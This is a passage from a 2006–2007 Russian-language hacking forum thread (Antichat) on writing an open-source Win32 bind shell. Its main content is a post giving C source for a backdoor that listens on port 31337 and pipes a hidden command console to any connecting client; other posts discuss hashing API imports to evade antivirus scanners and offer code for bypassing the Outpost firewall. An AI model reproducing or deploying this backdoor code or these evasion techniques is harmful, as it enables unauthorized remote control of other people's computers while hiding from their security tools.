ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
Перезагрузить страницу Начнем опенсорс - биндшелл (Win32)
   
Ответ
Страница 2 из 4 < 1 2 3 4 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 02.06.2006, 18:58
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496

Репутация: 519
По умолчанию
Цитата:
Сообщение от W!z@rD  
я так понял это с поддержкой NET...
Ты неправильно понял
 
Ответить с цитированием

  #12  
Старый 03.06.2006, 03:18
W!z@rD
Reservists Of Antichat - Level 6
Регистрация: 12.02.2006
Сообщений: 891
Провел на форуме:
1892597

Репутация: 836


Отправить сообщение для W!z@rD с помощью ICQ
По умолчанию
извиняюсь...
__________________
*********************************
*Я не волшебник ٩(๏̯͡๏)۶, только учусь...*
*********************************
Программы на заказ
Times to fly...
 
Ответить с цитированием

  #13  
Старый 11.06.2006, 01:45
sn0w
Статус пользователя:
Регистрация: 26.07.2005
Сообщений: 568
Провел на форуме:
1290766

Репутация: 1236


По умолчанию
вообщем в данный момент ничего сделать не могу, но как замучу так запостю.
__________________


snow white world wide
 
Ответить с цитированием

  #14  
Старый 11.06.2006, 09:59
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию
Цитата:
Сообщение от grinay  
Какой еще нафиг обом ..все компилиться и без нее.. lcc-win32 попробуй..весит херню..
Да и тем более если сильно надо могу бинарник выложить..
На Microsoft visual C++ 6.0 не компилируеться. Можешь выложишь скомпилированный?
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #15  
Старый 11.06.2006, 22:30
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию
Цитата:
На Microsoft visual C++ 6.0 не компилируеться. Можешь выложишь скомпилированный?
Наверно не подключил lib(а) файл.
Скомпилированный модно найти по имени netcat.exe больше возножностей меньше глюков
 
Ответить с цитированием

  #16  
Старый 13.06.2006, 01:58
Cr4sh
Познающий
Регистрация: 25.08.2005
Сообщений: 57
Провел на форуме:
216363

Репутация: 76
Отправить сообщение для Cr4sh с помощью ICQ
По умолчанию
Цитата:
Как стартовый вариант предлагаю нижеприведенный код. 2 кила на выходе замечания и предложения сыпем сюда)
имхо, поиск api-фций по хэшу не очень целесообразная байда для такой мелочи...

это мой:
Код:
SOCKET s;
int port = 31337;

DWORD WINAPI ToClient(LPVOID client_socket)
{
	char buf[1024];
	DWORD fexit;
	char s_str[255];

	s =((SOCKET *) client_socket)[0];

	//а здесь будет создаватся пайп, запускатся консоль, итд...
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	SECURITY_ATTRIBUTES sa;

	DWORD N, total;

	HANDLE cstdin, wstdin, rstdout, cstdout;
			
	sa.lpSecurityDescriptor = NULL;
	sa.nLength = sizeof(sa);
	sa.bInheritHandle = TRUE;

	if (!CreatePipe(&cstdin, &wstdin, &sa, 0))
		return -1;
	if (!CreatePipe(&rstdout, &cstdout, &sa, 0))
		return -1;

	GetStartupInfoA(&si);
	si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
	si.wShowWindow = FALSE;
	si.hStdOutput = cstdout;
	si.hStdError = cstdout;
	si.hStdInput = cstdin;

	getstr(s_str, 63);

	if (!CreateProcessA(0, s_str, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0,0,&si,&pi))
		return -1;

	while(GetExitCodeProcess(pi.hProcess,&fexit) && (fexit == STILL_ACTIVE))
	{
		GSleep(1);
		if (PeekNamedPipe(rstdout, buf, 1, &N, &total, 0) && N)
		{
			for (int i = 0; i < (int)total; i += 1)
			{
				ReadFile(rstdout, buf, 1, &N, 0);
				send(s, buf, N, 0);
			}
		}

		if (!ioctlsocket(s, FIONREAD , &N) && N)
		{
			recv(s, buf, 1, 0);
			WriteFile(wstdin, buf, 1, &N, 0);
		}
	}
	TerminateProcess(pi.hProcess, 0);
	TerminateThread(pi.hThread, 0);
	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);

	DbgMsg(__FILE__, __LINE__, "SHELL: client disconnected\n");

	closesocket(s);

	return 0;
}

DWORD WINAPI bindshell_main(LPVOID param)
{
	struct sockaddr_in local;
	SOCKET s;
	
	local.sin_family = AF_INET; 
	local.sin_port = htons(shell_port);
	local.sin_addr.s_addr = 0;

	s = socket(AF_INET, SOCK_STREAM,0); 

	if (s == INVALID_SOCKET)
        return -1;

	if (bind(s, (struct sockaddr*)&local, sizeof(local)) == SOCKET_ERROR) 
        return -1;

	DbgMsg(__FILE__, __LINE__, "SHELL: binded at %d port\n", 
		shell_port);

	if (Glisten(s, 0x100))
    {
		closesocket(s);
		return -1;
    }

	DbgMsg(__FILE__, __LINE__, "SHELL: waiting for connections...\n");

	SOCKET client_socket;    
    sockaddr_in client_addr;  

	int client_addr_size=sizeof(client_addr);
	while((client_socket = (SOCKET)accept(s, (sockaddr *)&client_addr, &client_addr_size)))
    {
   		DWORD thID;

		DbgMsg(__FILE__, __LINE__, "SHELL: client connected, remote addr %s\n", 
			inet_ntoa(client_addr.sin_addr));

		CreateThread(NULL, NULL, ToClient, &client_socket, NULL, &thID);
    }

	closesocket(s);

	return 0;
}
 
Ответить с цитированием

  #17  
Старый 06.07.2006, 15:14
sn0w
Статус пользователя:
Регистрация: 26.07.2005
Сообщений: 568
Провел на форуме:
1290766

Репутация: 1236


По умолчанию
Цитата:
Сообщение от Cr4sh  
имхо, поиск api-фций по хэшу не очень целесообразная байда для такой мелочи...
ясен пень. просто для того чтбы снести импорты. . сканеры вроде avz любят делать предположения относительно вероятного использования программы на основе того что она импортирует из api
__________________


snow white world wide
 
Ответить с цитированием

  #18  
Старый 06.07.2006, 18:05
Rabid Rabbit
Участник форума
Регистрация: 31.08.2003
Сообщений: 177
Провел на форуме:
249275

Репутация: 22
По умолчанию
grinay, сначит сделали асепт и закрылись нафиг сразу же=) 0x0000 - прикольно =)
sn0w ниасилил)
Cr4sh if (s == INVALID_SOCKET) - это все гон, моно так: if (s == -1) (if (s<0) не потянет посоку унсигнед) а лучше воще без этого обойтись. я никада не проверяю носок после s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP). в системе носков дофига, ограничение на к-во одновременно открытых да и то на уровне ядра, приложение может держать открытыми сколько захочет. потом перед биндом надобы выдать
setsockopt с SO_REUSEADDR для профилактики.
ну вощем это так вкратце, особо я не углублялся.
чо хотел еще сказать - парадокс: для того чтобы запустить ваши шелы на тачке нуна выдать команду на запуск, а если это моно сделать то нафига тода шелл (темболее в виде самостоятельного приложение, которое видно (прогу видно а потоки почемуто прячем?)? для удобства шоли? прекращайте лучше крючкотворством заниматься, пишите реальные вещи для реальных задач.
 
Ответить с цитированием

  #19  
Старый 16.04.2007, 23:15
slesh
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241

Репутация: 3349


Отправить сообщение для slesh с помощью ICQ
По умолчанию
Эх.. Какже легко обходить этот аутпост через поставные проги.. просто жуть. Кому интерестно, тому могу кинуть кусок кода
 
Ответить с цитированием

  #20  
Старый 20.04.2007, 10:25
undewaternemo
Познающий
Регистрация: 11.03.2007
Сообщений: 57
Провел на форуме:
89195

Репутация: 1
По умолчанию
Цитата:
Сообщение от slesh  
Эх.. Какже легко обходить этот аутпост через поставные проги.. просто жуть. Кому интерестно, тому могу кинуть кусок кода
1237 собак inbox.ru
поделись плиз -- как раз гдето тут пишу
 
Ответить с цитированием
Ответ
Страница 2 из 4 < 1 2 3 4 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ